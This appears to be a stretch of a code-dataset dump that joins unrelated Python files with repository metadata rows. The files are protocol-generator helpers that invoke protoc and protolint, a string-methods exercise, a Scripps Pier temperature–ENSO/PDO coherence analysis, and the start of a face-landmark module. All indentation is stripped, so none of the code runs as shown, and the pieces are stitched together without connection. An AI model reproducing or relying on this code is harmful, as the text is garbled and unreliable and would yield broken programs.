inside_string, inside_string.index("[")
)
except SyntaxError:
raise SyntaxError(
"Bad formatting. No matching close bracket ']' for the open bracket at {}".format(
inside_string[
: inside_string.index("[") + 1
].strip()
)
)
sub_type = inside_string[: closing_bracket_index + 1].strip()
the_rest_of_inside_string = inside_string[
closing_bracket_index + 1 :
].strip()
if (
the_rest_of_inside_string.find(",") == -1
): # No comma; this is the last sub-type
inside_string = the_rest_of_inside_string.strip()
else: # There is a comma; this is not the last sub-type
inside_string = the_rest_of_inside_string[
the_rest_of_inside_string.index(",") + 1 :
].strip()
if not do_not_add:
sub_types_list.append(sub_type)
return tuple(sub_types_list)
raise SyntaxError(
"{} is not a valid compositional type.".format(compositional_type)
)
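# Illustrative decompositions (example values, not from the source):
#   _get_sub_types_of_compositional_types("pt:dict[pt:str, pt:int]") -> ("pt:str", "pt:int")
#   _get_sub_types_of_compositional_types("Union[int, FrozenSet[bool]]") -> ("int", "FrozenSet[bool]")
# The trailing "..." of a Tuple (e.g. "Tuple[int, ...]") is deliberately not returned.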
def _union_sub_type_to_protobuf_variable_name(
content_name: str, content_type: str
) -> str:
"""
Given a content of type union, create a variable name for its sub-type for protobuf.
:param content_name: the name of the content
:param content_type: the sub-type of a union type
:return: The variable name
"""
if content_type.startswith("FrozenSet"):
sub_type = _get_sub_types_of_compositional_types(content_type)[0]
expanded_type_str = "set_of_{}".format(sub_type)
elif content_type.startswith("Tuple"):
sub_type = _get_sub_types_of_compositional_types(content_type)[0]
expanded_type_str = "list_of_{}".format(sub_type)
elif content_type.startswith("Dict"):
sub_type_1 = _get_sub_types_of_compositional_types(content_type)[0]
sub_type_2 = _get_sub_types_of_compositional_types(content_type)[1]
expanded_type_str = "dict_of_{}_{}".format(sub_type_1, sub_type_2)
else:
expanded_type_str = content_type
protobuf_variable_name = "{}_type_{}".format(content_name, expanded_type_str)
return protobuf_variable_name
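# Illustrative mappings (example values, not from the source):
#   _union_sub_type_to_protobuf_variable_name("query", "Dict[str, int]") -> "query_type_dict_of_str_int"
#   _union_sub_type_to_protobuf_variable_name("query", "int") -> "query_type_int"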
def _python_pt_or_ct_type_to_proto_type(content_type: str) -> str:
"""
Convert a PT or CT from python to their protobuf equivalent.
:param content_type: the python type
:return: The protobuf equivalent
"""
if content_type in PYTHON_TYPE_TO_PROTO_TYPE.keys():
proto_type = PYTHON_TYPE_TO_PROTO_TYPE[content_type]
else:
proto_type = content_type
return proto_type
def _includes_custom_type(content_type: str) -> bool:
"""
Evaluate whether a content type is a custom type or has a custom type as a sub-type.
:param content_type: the content type
:return: Boolean result
"""
if content_type.startswith("Optional"):
sub_type = _get_sub_types_of_compositional_types(content_type)[0]
result = _includes_custom_type(sub_type)
elif content_type.startswith("Union"):
sub_types = _get_sub_types_of_compositional_types(content_type)
result = False
for sub_type in sub_types:
if _includes_custom_type(sub_type):
result = True
break
elif (
content_type.startswith("FrozenSet")
or content_type.startswith("Tuple")
or content_type.startswith("Dict")
or content_type in PYTHON_TYPE_TO_PROTO_TYPE.keys()
):
result = False
else:
result = True
return result
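# Illustrative results (example values, not from the source):
#   _includes_custom_type("Optional[DataModel]") -> True   # "DataModel" is not a built-in type
#   _includes_custom_type("Dict[str, int]") -> False       # built-in sub-types only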
def is_installed(programme: str) -> bool:
"""
Check whether a programme is installed on the system.
:param programme: the name of the programme.
:return: True if installed, False otherwise
"""
res = shutil.which(programme)
return res is not None
def base_protolint_command() -> str:
"""
Return the base protolint command.
:return: The base protolint command
"""
if sys.platform.startswith("win"):
protolint_base_cmd = "protolint" # pragma: nocover
else:
protolint_base_cmd = "PATH=${PATH}:${GOPATH}/bin/:~/go/bin protolint"
return protolint_base_cmd
def check_prerequisites() -> None:
"""Check whether a programme is installed on the system."""
# check black code formatter is installed
if not is_installed("black"):
raise FileNotFoundError(
"Cannot find black code formatter! To install, please follow this link: https://black.readthedocs.io/en/stable/installation_and_usage.html"
)
# check isort code formatter is installed
if not is_installed("isort"):
raise FileNotFoundError(
"Cannot find isort code formatter! To install, please follow this link: https://pycqa.github.io/isort/#installing-isort"
)
# check protolint code formatter is installed
if subprocess.call(f"{base_protolint_command()} version", shell=True) != 0: # nosec
raise FileNotFoundError(
"Cannot find protolint protocol buffer schema file linter! To install, please follow this link: https://github.com/yoheimuta/protolint."
)
# check protocol buffer compiler is installed
if not is_installed("protoc"):
raise FileNotFoundError(
"Cannot find protocol buffer compiler! To install, please follow this link: https://developers.google.com/protocol-buffers/"
)
def get_protoc_version() -> str:
"""Get the protoc version used."""
result = subprocess.run( # nosec
["protoc", "--version"], stdout=subprocess.PIPE, check=True
)
result_str = result.stdout.decode("utf-8").strip("\n").strip("\r")
return result_str
def load_protocol_specification(specification_path: str) -> ProtocolSpecification:
"""
Load a protocol specification.
:param specification_path: path to the protocol specification yaml file.
:return: A ProtocolSpecification object
"""
config_loader = ConfigLoader(
"protocol-specification_schema.json", ProtocolSpecification
)
protocol_spec = config_loader.load_protocol_specification(
open_file(specification_path)
)
return protocol_spec
def _create_protocol_file(
path_to_protocol_package: str, file_name: str, file_content: str
) -> None:
"""
Create a file in the generated protocol package.
:param path_to_protocol_package: path to the file
:param file_name: the name of the file
:param file_content: the content of the file
"""
pathname = os.path.join(path_to_protocol_package, file_name)
with open_file(pathname, "w") as file:
file.write(file_content)
def try_run_black_formatting(path_to_protocol_package: str) -> None:
"""
Run Black code formatting via subprocess.
:param path_to_protocol_package: a path where formatting should be applied.
"""
subprocess.run( # nosec
[sys.executable, "-m", "black", path_to_protocol_package, "--quiet"],
check=True,
)
def try_run_isort_formatting(path_to_protocol_package: str) -> None:
"""
Run Isort code formatting via subprocess.
:param path_to_protocol_package: a path where formatting should be applied.
"""
subprocess.run( # nosec
[sys.executable, "-m", "isort", *ISORT_CLI_ARGS, path_to_protocol_package],
check=True,
)
def try_run_protoc(
path_to_generated_protocol_package: str,
name: str,
language: str = PROTOCOL_LANGUAGE_PYTHON,
) -> None:
"""
Run 'protoc' protocol buffer compiler via subprocess.
:param path_to_generated_protocol_package: path to the protocol buffer schema file.
:param name: name of the protocol buffer schema file.
:param language: the target language in which to compile the protobuf schema file
"""
    # for closure-styled JS imports, remove the "import_style=commonjs,binary:" prefix computed below
js_commonjs_import_option = (
"import_style=commonjs,binary:" if language == PROTOCOL_LANGUAGE_JS else ""
)
language_part_of_the_command = f"--{language}_out={js_commonjs_import_option}{path_to_generated_protocol_package}"
subprocess.run( # nosec
[
"protoc",
f"-I={path_to_generated_protocol_package}",
language_part_of_the_command,
f"{path_to_generated_protocol_package}/{name}.proto",
],
stderr=subprocess.PIPE,
encoding="utf-8",
check=True,
env=os.environ.copy(),
)
def try_run_protolint(path_to_generated_protocol_package: str, name: str) -> None:
"""
Run 'protolint' linter via subprocess.
:param path_to_generated_protocol_package: path to the protocol buffer schema file.
:param name: name of the protocol buffer schema file.
"""
# path to proto file
path_to_proto_file = os.path.join(
path_to_generated_protocol_package,
f"{name}.proto",
)
# Dump protolint configuration into a temporary file
temp_dir = tempfile.mkdtemp()
path_to_configuration_in_tmp_file = Path(
temp_dir, PROTOLINT_CONFIGURATION_FILE_NAME
)
with open_file(path_to_configuration_in_tmp_file, "w") as file:
file.write(PROTOLINT_CONFIGURATION)
# Protolint command
cmd = f'{base_protolint_command()} lint -config_path={path_to_configuration_in_tmp_file} -fix "{path_to_proto_file}"'
# Execute protolint command
subprocess.run( # nosec
cmd,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
encoding="utf-8",
check=True,
env=os.environ.copy(),
shell=True,
)
# Delete temporary configuration file
shutil.rmtree(temp_dir) # pragma: no cover
def check_protobuf_using_protoc(
path_to_generated_protocol_package: str, name: str
) -> Tuple[bool, str]:
"""
Check whether a protocol buffer schema file is valid.
Validation is via trying to compile the schema file. If successfully compiled it is valid, otherwise invalid.
If valid, return True and a 'protobuf file is valid' message, otherwise return False and the error thrown by the compiler.
:param path_to_generated_protocol_package: path to the protocol buffer schema file.
:param name: name of the protocol buffer schema file.
:return: Boolean result and an accompanying message
"""
try:
try_run_protoc(path_to_generated_protocol_package, name)
os.remove(os.path.join(path_to_generated_protocol_package, name + "_pb2.py"))
return True, "protobuf file is valid"
except subprocess.CalledProcessError as e:
pattern = name + ".proto:[0-9]+:[0-9]+: "
error_message = re.sub(pattern, "", e.stderr[:-1])
return False, error_message
def compile_protobuf_using_protoc(
path_to_generated_protocol_package: str, name: str, language: str
) -> Tuple[bool, str]:
"""
Compile a protocol buffer schema file using protoc.
If successfully compiled, return True and a success message,
otherwise return False and the error thrown by the compiler.
:param path_to_generated_protocol_package: path to the protocol buffer schema file.
:param name: name of the protocol buffer schema file.
:param language: the target language in which to compile the protobuf schema file
:return: Boolean result and an accompanying message
"""
try:
try_run_protoc(path_to_generated_protocol_package, name, language)
return True, "protobuf schema successfully compiled"
except subprocess.CalledProcessError as e:
pattern = name + ".proto:[0-9]+:[0-9]+: "
error_message = re.sub(pattern, "", e.stderr[:-1])
return False, error_message
def apply_protolint(path_to_proto_file: str, name: str) -> Tuple[bool, str]:
"""
Apply protolint linter to a protocol buffer schema file.
If no output, return True and a success message,
otherwise return False and the output shown by the linter
(minus the indentation suggestions which are automatically fixed by protolint).
:param path_to_proto_file: path to the protocol buffer schema file.
:param name: name of the protocol buffer schema file.
:return: Boolean result and an accompanying message
"""
try:
try_run_protolint(path_to_proto_file, name)
return True, "protolint has no output"
except subprocess.CalledProcessError as e:
lines_to_show = []
for line in e.stderr.split("\n"):
to_show = True
for whitelist_error_str in PROTOLINT_ERROR_WHITELIST:
if whitelist_error_str in line:
to_show = False
break
if to_show:
lines_to_show.append(line)
error_message = "\n".join(lines_to_show)
return False, error_message
| 35.636678 | 151 | 0.646373 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8,884 | 0.431304 |
bcd88cb9aee8377371dcb96cf615ef4e2ec10580 | 4,113 | py | Python | exercises/level_0/stringing.py | eliranM98/python_course | d9431dd6c0f27fca8ca052cc2a821ed0b883136c | [
"MIT"
] | 6 | 2019-03-29T06:14:53.000Z | 2021-10-15T23:42:36.000Z | exercises/level_0/stringing.py | eliranM98/python_course | d9431dd6c0f27fca8ca052cc2a821ed0b883136c | [
"MIT"
] | 4 | 2019-09-06T10:03:40.000Z | 2022-03-11T23:30:55.000Z | exercises/level_0/stringing.py | eliranM98/python_course | d9431dd6c0f27fca8ca052cc2a821ed0b883136c | [
"MIT"
] | 12 | 2019-06-20T19:34:52.000Z | 2021-10-15T23:42:39.000Z | text = '''
Victor Hugo's ({}) tale of injustice, heroism and love follows the fortunes of Jean Valjean, an escaped convict determined to put his criminal past behind him. But his attempts to become a respected member of the community are constantly put under threat: by his own conscience, when, owing to a case of mistaken identity, another man is arrested in his place; and by the relentless investigations of the dogged Inspector Javert. It is not simply for himself that Valjean must stay free, however, for he has sworn to protect the baby daughter of Fantine, driven to prostitution by poverty.
Norman Denny's ({}) lively English translation is accompanied by an introduction discussing Hugo's political and artistic aims in writing Les Miserables.
Victor Hugo (1802-85) wrote volumes of criticism, dramas, satirical verse and political journalism but is best remembered for his novels, especially Notre-Dame de Paris (also known as The Hunchback of Notre-Dame) and Les Miserables, which was adapted into one of the most successful musicals of all time.
'All human life is here'
Cameron Mackintosh, producer of the musical Les Miserables
'One of the half-dozen greatest novels of the world'
Upton Sinclair
'A great writer - inventive, witty, sly, innovatory'
A. S. Byatt, author of Possession
'''
name = 'Victor'
word1 = 'writer'
word2 = 'witty'
numbers = "0123456789"
small_letters = 'abcdefghijklmnopqrstuvwxyz'
big_letters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
name_index = text.find(name)
name_plus3 = text[name_index: name_index+len(name)+3]
word1_index = text.find(word1, 0, 100)
word2_index = text.find(word2, int(len(text)/2), len(text))
count_characters = text.count('of')
is_text_starts_with_name = text.startswith(name)
is_text_ends_with_name = text.endswith(name)
text = text.format('1822-95', '1807-63')
words = text.split(' ')
text1 = ''.join(words)
text2 = ','.join(words)
text3 = '_'.join(words)
text4 = ' '.join(words)
text5 = text.replace('of', '@🐔')
text6 = text.capitalize()
text7 = text.replace('a', '')
text8 = text.strip()
upper_name = name.upper()
lower_name = name.lower()
is_name_upper = name.isupper()
is_name_lower = name.islower()
is_big_letters_upper = big_letters.isupper()
is_small_letters_lower = small_letters.islower()
stringed_integer = '90'.isnumeric()
stringed_float = '90.5'.isnumeric()
converted_int = int('90')
converted_float = float('90.5')
converted_string = str(183)
is_digit = converted_string[1].isdigit()
edges = small_letters[0] + big_letters[-1]
body = numbers[1:-1]
evens = numbers[::2]
odds = numbers[1::2]
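# Note on the slices above (explanatory comment, not part of the original exercise):
# seq[start:stop:step] -- so numbers[::2] keeps characters 0,2,4,... ("02468")
# and numbers[1::2] keeps characters 1,3,5,... ("13579").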
print('name', name)
print('word1', word1)
print('word2', word2)
print('numbers', numbers)
print('small_letters', small_letters)
print('big_letters', big_letters)
print('name_index', name_index)
print('name_plus3', name_plus3)
print('word1_index', word1_index)
print('word2_index', word2_index)
print('count_characters -> \'of\' in the text', count_characters)
print('is_text_starts_with_name', is_text_starts_with_name)
print('is_text_ends_with_name', is_text_ends_with_name)
print('\n\n\n\n\n', 'text', text, '\n\n\n\n\n')
print('\n\n\n\n\n', 'words', words, '\n\n\n\n\n')
print('\n\n\n\n\n', 'text1', text1, '\n\n\n\n\n')
print('\n\n\n\n\n', 'text2', text2, '\n\n\n\n\n')
print('\n\n\n\n\n', 'text3', text3, '\n\n\n\n\n')
print('\n\n\n\n\n', 'text4', text4, '\n\n\n\n\n')
print('\n\n\n\n\n', 'text5', text5, '\n\n\n\n\n')
print('\n\n\n\n\n', 'text6', text6, '\n\n\n\n\n')
print('\n\n\n\n\n', 'text7', text7, '\n\n\n\n\n')
print('\n\n\n\n\n', 'text8', text8, '\n\n\n\n\n')
print('upper_name', upper_name)
print('lower_name', lower_name)
print('is_name_upper', is_name_upper)
print('is_name_lower', is_name_lower)
print('is_big_letters_upper', is_big_letters_upper)
print('is_small_letters_lower', is_small_letters_lower)
print('stringed_integer', stringed_integer)
print('stringed_float', stringed_float)
print('converted_int', converted_int)
print('converted_float', converted_float)
print('converted_string', converted_string)
print('is_digit', is_digit)
print('edges', edges)
print('body', body)
print('evens', evens)
print('odds', odds)
| 41.545455 | 590 | 0.735959 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,193 | 0.532799 |
bceaba57987d2038b2b3f984d0fa700547f6902c | 12,224 | py | Python | SIO_Code/SIO_coherence.py | mmstoll/Ocean569_Code | 228cb719f3e82f187f704f343d3b3590a38236d7 | [
"MIT"
] | null | null | null | SIO_Code/SIO_coherence.py | mmstoll/Ocean569_Code | 228cb719f3e82f187f704f343d3b3590a38236d7 | [
"MIT"
] | null | null | null | SIO_Code/SIO_coherence.py | mmstoll/Ocean569_Code | 228cb719f3e82f187f704f343d3b3590a38236d7 | [
"MIT"
] | null | null | null | """
Data: Temperature and Salinity time series from SIO Scripps Pier
Salinity: measured in PSU at the surface (~0.5m) and at depth (~5m)
Temp: measured in degrees C at the surface (~0.5m) and at depth (~5m)
- Timestamp included beginning in 1990
"""
# imports
import sys,os
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import datetime
from scipy import signal
import scipy.stats as ss
import SIO_modules as SIO_mod
from importlib import reload
reload(SIO_mod)
# read in temp and sal files
sal_data = pd.read_csv('/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/SIO_SALT_1916-201905.txt', sep='\t', skiprows = 27)
temp_data = pd.read_csv('/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/SIO_TEMP_1916_201905.txt', sep='\t', skiprows = 26)
ENSO_data = pd.read_excel('/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/NOAA_ENSO_data.xlsx')
ENSO_data_recent = pd.read_excel('/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/NOAA_ENSO_recent_data.xlsx')
PDO_data = pd.read_csv('/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/NOAA_PDO_data.csv', skiprows = 1)
path_out = '/Users/MMStoll/Python/Output/Ocean569_Output/SIO_Output/'
# convert year, month, day columns to single DATE column
sal_data['DATE'] = pd.to_datetime(sal_data[['YEAR', 'MONTH', 'DAY']])
temp_data['DATE'] = pd.to_datetime(temp_data[['YEAR', 'MONTH', 'DAY']])
ENSO_data_all = ENSO_data.append(ENSO_data_recent[323:], ignore_index = True)
PDO_data['DATE'] = pd.to_datetime(PDO_data['Date'], format='%Y%m')
# remove uncertain data(SURF_FLAG between 1 and 4), replace with NaN, then interpolate
for i in range(0,len(sal_data['SURF_SAL_PSU'])):
if (sal_data['SURF_FLAG'][i] >= 1) and (sal_data['SURF_FLAG'][i] <=4):
sal_data['SURF_SAL_PSU'][i] = np.nan
for i in range(0,len(temp_data['SURF_TEMP_C'])):  # filter the temperature series (original re-tested sal here by copy-paste; assumes the temp file also has a SURF_FLAG column)
    if (temp_data['SURF_FLAG'][i] >= 1) and (temp_data['SURF_FLAG'][i] <=4):
        temp_data['SURF_TEMP_C'][i] = np.nan
# interpolate missing temp and sal data
sal_data['SURF_SAL_PSU'] = sal_data['SURF_SAL_PSU'].interpolate()
temp_data['SURF_TEMP_C'] = temp_data['SURF_TEMP_C'].interpolate()
sal_data['SURF_SAL_PSU'][0] = sal_data['SURF_SAL_PSU'][1]
# remove the average from the sal and temp data and create new columns
sal_data['SURF_SAL_PSU_NOAVG'] = sal_data['SURF_SAL_PSU'] - sal_data['SURF_SAL_PSU'].mean()
temp_data['SURF_TEMP_C_NOAVG'] = temp_data['SURF_TEMP_C'] - temp_data['SURF_TEMP_C'].mean()
# remove trends from the sal and temp data and create new columns
sal_fit = np.polyfit(sal_data.index,sal_data['SURF_SAL_PSU_NOAVG'],1)
sal_fit_fn = np.poly1d(sal_fit)
temp_fit = np.polyfit(temp_data.index,temp_data['SURF_TEMP_C_NOAVG'],1)
temp_fit_fn = np.poly1d(temp_fit)
sal_fit_value = sal_fit_fn(sal_data.index)
temp_fit_value = temp_fit_fn(temp_data.index)
sal_data['SURF_SAL_PSU_DETREND'] = sal_data['SURF_SAL_PSU_NOAVG'] - sal_fit_value
temp_data['SURF_TEMP_C_DETREND'] = temp_data['SURF_TEMP_C_NOAVG'] - temp_fit_value
sal_tri = sal_data['SURF_SAL_PSU_DETREND'].rolling(center = True, window = 30, min_periods = 3, win_type = 'triang').mean()
temp_tri = temp_data['SURF_TEMP_C_DETREND'].rolling(center = True, window = 30, min_periods = 3, win_type = 'triang').mean()
# # 1. FFT the SIO Data
# t_freq,t_spec,t_spec_amp,t_fft,t_delt,t_freq_T,t_freq_nyquist = SIO_mod.var_fft(temp_data['SURF_TEMP_C_DETREND'])
# # 2. Apply butterworth filter to SIO data, with cutoff equal to nyquist freq of enso index
# fs = 1 # sampling frequency, once per day
# fc = 1/60 # cut-off frequency of the filter (cut off periods shorter than 60 days)
# w = fc / (fs / 2) #normalize the frequency
# b, a = signal.butter(4, w, 'low')
# temp_output = signal.filtfilt(b, a, t_spec)
# # 3. Inverse FFT of filtered SIO data
# temp_ifft = np.fft.irfft(temp_output,n=len(temp_output))
# # 4. Subsample new SIO time series with same delta t as ENSO index (once per month)
# temp_ifft_sampled = np.mean(temp_ifft[0:18750].reshape(-1, 30), axis=1)
# temp_ifft_len = temp_ifft_sampled[0:618]
# x = np.linspace(0,18770, 18770)
# plt.figure()
# plt.loglog(x, temp_ifft)
# plt.show()
# butterworth low pass filter for temperature and salinity
fs = 1 # sampling frequency, once per day
fc = 1/500 # cut-off frequency of the filter (cut off periods shorter than 500 days)
w = fc / (fs / 2) #normalize the frequency
b, a = signal.butter(4, w, 'low')
temp_output = signal.filtfilt(b, a, temp_tri)
sal_output = signal.filtfilt(b, a, sal_tri)
temp_sampled = np.mean(temp_output[0:37530].reshape(-1, 30), axis=1) #length = 1251
# create dataframe with spectra for each variable
spectra_temp_df = pd.DataFrame(columns = ['Temp_freq', 'Temp_spec', 'Temp_fft'])
spectra_sal_df = pd.DataFrame(columns = ['Sal_freq', 'Sal_spec', 'Sal_fft'])
spectra_PDO_df = pd.DataFrame(columns = ['PDO_freq', 'PDO_spec', 'PDO_fft'])
spectra_ENSO_df = pd.DataFrame(columns = ['ENSO_freq', 'ENSO_spec', 'ENSO_fft'])
# for coherence, start all records at 1916-01-01
# ENSO data [20:] 1916-09-01 onward, monthly// ends now, through 2019-05-01 [:1254]
# Temp data [10:] 1916-09-01 onward, daily // ends 2019-05-31
# PDO data [752:] 1916-09-01 onward, monthly// ends now, thorugh 2019-05-01 [:1985]
# compute spectral variables for each variable
for j in range(0,4):
data_sets = [temp_sampled, sal_data['SURF_SAL_PSU_DETREND'], PDO_data['Value'][743:], ENSO_data_all['VALUE'][14:]]
freq, spec, spec_amp, fft, delt, freq_T, freq_nyquist = SIO_mod.var_fft(data_sets[j])
if j == 0:
spectra_temp_df['Temp_freq'] = freq
spectra_temp_df['Temp_spec'] = spec
spectra_temp_df['Temp_fft'] = fft
if j == 1:
spectra_sal_df['Sal_freq'] = freq
spectra_sal_df['Sal_spec'] = spec
spectra_sal_df['Sal_fft'] = fft
if j == 2:
spectra_PDO_df['PDO_freq'] = freq
spectra_PDO_df['PDO_spec'] = spec
spectra_PDO_df['PDO_fft'] = fft
if j == 3:
spectra_ENSO_df['ENSO_freq'] = freq
spectra_ENSO_df['ENSO_spec'] = spec
spectra_ENSO_df['ENSO_fft'] = fft
def band_average(fft_var1,fft_var2,frequency,n_av):
# fft_var1 and fft_var2 are the inputs computed via fft
# they can be the same variable or different variables
# n_av is the number of bands to be used for smoothing (nice if it is an odd number)
    # this function is limited to 100,000 points but can easily be modified
nmax=100000
# T_length = (len(fft_var1) * 2 - 2)
# define some variables and arrays
n_spec=len(fft_var1)
n_av2=int(n_av//2+1) #number of band averages/2 + 1
spec_amp_av=np.zeros(nmax)
spec_phase_av=np.zeros(nmax)
freq_av=np.zeros(nmax)
# average the lowest frequency bands first (with half as many points in the average)
sum_low_amp=0.
sum_low_phase=0.
count=0
spectrum_amp=np.absolute(fft_var1*np.conj(fft_var2))#/(2.*np.pi*T_length*delt)
spectrum_phase=np.angle(fft_var1*np.conj(fft_var2),deg=True) #/(2.*np.pi*T_length*delt) don't know if I need the 2pi/Tdeltt here...
#
for i in range(0,n_av2):
sum_low_amp+=spectrum_amp[i]
sum_low_phase+=spectrum_phase[i]
    spec_amp_av[0]=sum_low_amp/n_av2
    spec_phase_av[0]=sum_low_phase/n_av2  # both sums run over n_av2 points, so both are averaged over n_av2
# compute the rest of the averages
for i in range(n_av2,n_spec-n_av,n_av):
count+=1
spec_amp_est=np.mean(spectrum_amp[i:i+n_av])
spec_phase_est=np.mean(spectrum_phase[i:i+n_av])
freq_est=frequency[i+n_av//2]
spec_amp_av[count]=spec_amp_est
spec_phase_av[count]=spec_phase_est
freq_av[count]=freq_est
# omega0 = 2.*np.pi/(T_length*delt)
# contract the arrays
spec_amp_av=spec_amp_av[0:count]
spec_phase_av=spec_phase_av[0:count]
freq_av=freq_av[0:count]
return spec_amp_av,spec_phase_av,freq_av,count
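# Minimal usage sketch for band_average (mirrors the calls below; variable names assumed from this script):
#   t_spec_b, t_phase_b, t_freq_b, count = band_average(t_fft, t_fft, t_freq, n_av)
#   cospec_amp, cospec_phase, freq_av, count = band_average(t_fft, np.conj(e_fft), e_freq, n_av)
#   coh_sq = cospec_amp**2 / (t_spec_b * e_spec_b)   # squared coherence, as computed below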
n_av = 5
# define terms to compute coherence between temp and ENSO
t_freq,t_spec,t_spec_amp,t_fft,t_delt,t_freq_T,t_freq_nyquist = SIO_mod.var_fft(temp_sampled) #take fft/compute spectra of temp_sampled at 30 day intervals
t_spec_b,t_phase_b,t_freq_av_b,count=band_average(t_fft,t_fft,t_freq,n_av)
e_spec_b,e_phase_b,e_freq_av_b,count=band_average(spectra_ENSO_df['ENSO_fft'],spectra_ENSO_df['ENSO_fft'],spectra_ENSO_df['ENSO_freq'],n_av)
e_fft_star = np.conj(spectra_ENSO_df['ENSO_fft'])
cospec_amp2,cospec_phase2,freq_av2,count2=band_average(t_fft,e_fft_star,spectra_ENSO_df['ENSO_freq'],n_av)
coh_sq2=cospec_amp2**2/(t_spec_b*e_spec_b)
# define colors
t_color = 'cadetblue'
s_color = 'darkslateblue'
p_color = 'seagreen'
e_color = 'steelblue'
freq_ann = 2*np.pi/365.25
# plot the coherence and phase between ENSO and temperature
tstr = 'SIO Temperature and ENSO Index \nCoherence and Phase'
im_name = 'SIO_TempENSO_CoherencePhase.jpg'
NR = 2; NC = 1
fig, axes = plt.subplots(nrows = NR,ncols=NC,figsize = (10,7))
axes[0].semilogx(freq_av2,coh_sq2, color = e_color)
axes[0].set_xlabel('$\omega$ (radians/day)')
axes[0].set_ylabel('Squared Coherence $\it{T}$-$\it{ENSO}$')
axes[0].axvline(t_freq_nyquist, color = 'black', linestyle = '--', alpha = 0.5)
axes[0].text(0.075, 0.1,'$\omega_{max}$', alpha = 0.5) #transform = ax.transAxes)
axes[0].axvline(t_freq_T, color = 'black', linestyle = '--', alpha = 0.5)
axes[0].text(0.00018, 0.1,'$\omega_o$', alpha = 0.5) #transform = ax.transAxes)
axes[0].axvline(freq_ann, color = 'black', linestyle = '--', alpha = 0.5)
axes[0].text(0.0098, 0.1, 'Annual', alpha = 0.5)#transform = ax.transAxes)
axes[1].semilogx(freq_av2, cospec_phase2, color = e_color)
axes[1].set_xlabel('$\omega$ (radians/day)')
axes[1].set_ylabel('Phase $\it{T}$-$\it{ENSO}$, degrees')
axes[1].axvline(t_freq_nyquist, color = 'black', linestyle = '--', alpha = 0.5)
axes[1].text(0.075, -110,'$\omega_{max}$', alpha = 0.5) #transform = ax.transAxes)
axes[1].axvline(t_freq_T, color = 'black', linestyle = '--', alpha = 0.5)
axes[1].text(0.00018, -110,'$\omega_o$', alpha = 0.5)#transform = ax.transAxes)
axes[1].axvline(freq_ann, color = 'black', linestyle = '--', alpha = 0.5)
axes[1].text(0.0098, -110, 'Annual', alpha = 0.5)#transform = ax.transAxes)
fig.suptitle(tstr)
# fig.tight_layout(pad=2.0)
plt.savefig(path_out + im_name)
plt.show()
n_av = 5
# define terms to compute coherence between temp and ENSO
#t_freq,t_spec,t_spec_amp,t_fft,t_delt,t_freq_T,t_freq_nyquist = SIO_mod.var_fft(temp_sampled) #take fft/compute spectra of temp_sampled at 30 day intervals
#t_spec_b,t_phase_b,t_freq_av_b,count=band_average(t_fft,t_fft,t_freq,n_av)
p_spec_b,p_phase_b,p_freq_av_b,count=band_average(spectra_PDO_df['PDO_fft'],spectra_PDO_df['PDO_fft'],spectra_PDO_df['PDO_freq'],n_av)
p_fft_star = np.conj(spectra_PDO_df['PDO_fft'])
cospec_amp2,cospec_phase2,freq_av2,count2=band_average(t_fft,p_fft_star,spectra_PDO_df['PDO_freq'],n_av)
coh_sq2=cospec_amp2**2/(t_spec_b*p_spec_b)
# plot the coherence and phase between ENSO and temperature
tstr = 'SIO Temperature and PDO Index \nCoherence and Phase'
im_name = 'SIO_TempPDO_CoherencePhase.jpg'
NR = 2; NC = 1
fig, axes = plt.subplots(nrows = NR,ncols=NC,figsize = (10,7))
axes[0].semilogx(freq_av2,coh_sq2, color = p_color)
axes[0].set_xlabel('$\omega$ (radians/day)')
axes[0].set_ylabel('Squared Coherence $\it{T}$-$\it{PDO}$')
axes[0].axvline(t_freq_nyquist, color = 'black', linestyle = '--', alpha = 0.5)
axes[0].text(0.075, 0.1,'$\omega_{max}$', alpha = 0.5) #transform = ax.transAxes)
axes[0].axvline(t_freq_T, color = 'black', linestyle = '--', alpha = 0.5)
axes[0].text(0.00018, 0.1,'$\omega_o$', alpha = 0.5) #transform = ax.transAxes)
axes[0].axvline(freq_ann, color = 'black', linestyle = '--', alpha = 0.5)
axes[0].text(0.0098, 0.1, 'Annual', alpha = 0.5)#transform = ax.transAxes)
axes[1].semilogx(freq_av2, cospec_phase2, color = p_color)
axes[1].set_xlabel('$\omega$ (radians/day)')
axes[1].set_ylabel('Phase $\it{T}$-$\it{PDO}$, degrees')
axes[1].axvline(t_freq_nyquist, color = 'black', linestyle = '--', alpha = 0.5)
axes[1].text(0.075, -110,'$\omega_{max}$', alpha = 0.5) #transform = ax.transAxes)
axes[1].axvline(t_freq_T, color = 'black', linestyle = '--', alpha = 0.5)
axes[1].text(0.00018, -110,'$\omega_o$', alpha = 0.5)#transform = ax.transAxes)
axes[1].axvline(freq_ann, color = 'black', linestyle = '--', alpha = 0.5)
axes[1].text(0.0098, -110, 'Annual', alpha = 0.5)#transform = ax.transAxes)
fig.suptitle(tstr)
# fig.tight_layout(pad=2.0)
plt.savefig(path_out + im_name)
plt.show()
| 47.015385 | 156 | 0.724967 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 5,673 | 0.464087 |
bcf0d2ce383dabf5df66eb0e8657dcde75189cda | 8,894 | py | Python | core/recognizer.py | awen1988/yry | b65ccd7062d60f605fc978a87e060d0015cf1d4c | [
"Apache-2.0"
] | 129 | 2017-11-14T07:20:33.000Z | 2021-06-18T07:07:18.000Z | core/recognizer.py | awen1988/yry | b65ccd7062d60f605fc978a87e060d0015cf1d4c | [
"Apache-2.0"
] | 10 | 2018-04-18T08:01:09.000Z | 2018-08-17T02:57:33.000Z | core/recognizer.py | awen1988/yry | b65ccd7062d60f605fc978a87e060d0015cf1d4c | [
"Apache-2.0"
] | 35 | 2017-11-14T07:17:00.000Z | 2021-01-21T08:10:07.000Z | """
recognize face landmark
"""
import json
import os
import requests
import numpy as np
FACE_POINTS = list(range(0, 83))
JAW_POINTS = list(range(0, 19))
LEFT_EYE_POINTS = list(range(19, 29))
LEFT_BROW_POINTS = list(range(29, 37))
